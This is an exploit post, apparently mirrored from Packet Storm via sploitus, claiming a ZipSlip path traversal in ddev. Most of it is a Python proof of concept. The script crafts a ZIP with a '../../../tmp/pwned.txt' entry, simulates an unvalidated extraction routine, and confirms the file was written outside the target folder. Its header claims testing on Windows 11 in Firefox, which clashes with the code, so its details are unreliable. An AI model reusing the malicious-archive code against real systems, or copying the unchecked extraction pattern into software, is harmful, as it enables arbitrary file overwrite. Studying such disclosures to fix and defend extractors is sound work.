Share
## https://sploitus.com/exploit?id=PACKETSTORM:219071
==================================================================================================================================
    | # Title     : ddev ZipSlip Path Traversal โ€“ Arbitrary File Write via Malicious Archive                                         |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : No standalone download available                                                                                 |
    ==================================================================================================================================
    
    [+] Summary    : A ZipSlip path traversal vulnerability exists in the ddev/ddev project, affecting archive extraction routines. 
                     The issue allows a crafted ZIP archive to write files outside the intended extraction directory, potentially leading to arbitrary file overwrite on the host system.
    
    
    [+] POC        :  
    
    #!/usr/bin/env python3
    
    
    import zipfile
    import os
    
    OUTPUT_ZIP = "exploit.zip"
    PAYLOAD_PATH = "../../../tmp/pwned.txt"   
    PAYLOAD_CONTENT = "HACKED: ZipSlip successful!\n"
    
    def create_malicious_zip():
        print("[*] Creating malicious ZIP...")
    
        with zipfile.ZipFile(OUTPUT_ZIP, 'w', zipfile.ZIP_DEFLATED) as z:
            z.writestr(PAYLOAD_PATH, PAYLOAD_CONTENT)
    
        print(f"[+] Malicious archive created: {OUTPUT_ZIP}")
        print(f"[+] Payload path inside archive: {PAYLOAD_PATH}")
    
    
    def simulate_vulnerable_extract(dest):
        """
        Simulates vulnerable ddev behavior
        (filepath.Join without validation)
        """
        print(f"\n[*] Simulating vulnerable extraction to: {dest}")
    
        with zipfile.ZipFile(OUTPUT_ZIP, 'r') as z:
            for file in z.infolist():
                extracted_path = os.path.join(dest, file.filename)  
    
                print(f"[!] Writing to: {extracted_path}")
    
                os.makedirs(os.path.dirname(extracted_path), exist_ok=True)
    
                with open(extracted_path, "wb") as f:
                    f.write(z.read(file.filename))
    
    
    def check_result():
        target = "/tmp/pwned.txt"
    
        print("\n[*] Checking result...")
    
        if os.path.exists(target):
            print(f"[+] SUCCESS: File written Off the track: {target}")
            with open(target) as f:
                print("[+] Content:", f.read())
        else:
            print("[-] Exploit failed")
    
    
    if __name__ == "__main__":
        create_malicious_zip()
        safe_dir = "./safe_extract"
        os.makedirs(safe_dir, exist_ok=True)
    
        simulate_vulnerable_extract(safe_dir)
    
        check_result()
    
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================